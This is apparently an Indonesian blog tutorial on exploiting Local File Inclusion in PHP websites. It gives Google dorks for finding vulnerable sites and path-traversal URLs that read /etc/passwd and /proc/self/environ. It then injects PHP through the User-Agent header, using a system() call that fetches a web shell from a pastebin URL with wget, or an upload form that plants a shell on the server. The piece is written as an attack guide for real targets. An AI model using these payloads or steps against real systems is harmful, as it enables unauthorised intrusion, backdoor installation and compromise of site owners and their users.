Exploit Local File Inclusion Vulnerability


Halo Exploiter !! Kali ini saya akan membagikan tutorial exploit LFI, sebenernya ni exploit udah lama banget ( Old ), bisa dibilang ni exploit basic bagi kalian para pentester, setara sama kaya SQL-I lah.





Google Dorks :





  • inurl:/view/lang/index.php?page=?page=
  • inurl:/shared/help.php?page=




saya anggap kalian sudah dapet targetnya, langsung aja test basic apa web tersebut vuln LFI.





  • target.com/view.php?page=email.php




Coba ganti email.php dengan ../../





  • target.com/view.php?page=../../




Jika kalian dapat error seperti





Warning: include(../../) [function.include]: failed to open stream: No such file or directory in /home/hackers/public_html/view.php on line 1337





Ada kesempatan untuk membuka localfile yang lebih sensitif
Kita coba panggil file /etc/passwd nya .





  • localhost/view.php?page=etc/passwd




Masih error ?





Warning: include(etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/hackers/public_html/view.php on line 1337




Kita coba naikkan direktori nya.





  • localhost/view.php?page=../../../../../etc/passwd




Kalau masih error, naikkan terus direktori nya sampai file /etc/passwd nya kebaca.





root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin




…. dsb :p





Sekarang kita coba panggil apakah proc/self/environ bisa diakses atau tidak. Karena disinilah proses inject backdoor akan dimulai.





  • localhost/view.php?page=../../../../../proc/self/environ




DOCUMENT_ROOT=/home/hackers/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t13371b341231b94r1844ac2ad7ac
HTTP_HOST=localhost HTTP_REFERER=http://localhost/view.php?page=../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2015102815 Ubuntu/9.04 (trusty) Firefox/5.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=127.0.0.1 REMOTE_PORT=1337
REQUEST_METHOD= GET REQUEST_URI = /view.php?page=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/hackers/public_html/view.php SCRIPT_NAME=/view.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=hackers@site.com SERVER_NAME=localhost
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at localhost Port 80




Berarti web tersebut bisa diinject. Kalau blank, berarti tidak bisa.
Langkah selanjutnya, aktifkan tamper data.
Load halaman localhost/view.php?page=../../../../../proc/self/environ
Lalu tamper.
pada user-agent di addons tamper data tadi isi dengan





<?system(‘wget https://pastebin.com/raw/YNpriSQu -O exploit.php’);?>




Lalu submit.





Shell kalian akan terletak di





  • target.com/exploit.php




Pada beberapa kasus, fungsi system di server dimatikan sehingga kita tidak bisa melakukan wget melalui cara diatas.
Tapi ada cara lain.
Pad user-agent masukkan script uploader berikut :





<?php @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']); ?><p>
<h1> shu </h1></p>
<br> <form action="" method="post" enctype="multipart/form-data">
Filename: <input type="file" name="file" /><input type="submit" value="Submit" /><br>




Setelah diupload, maka shell akan terletak di root path domain.





Reference : https://exploit.linuxsec.org/





Jika masih bingung, berikut videonya:






LihatTutupKomentar
loading...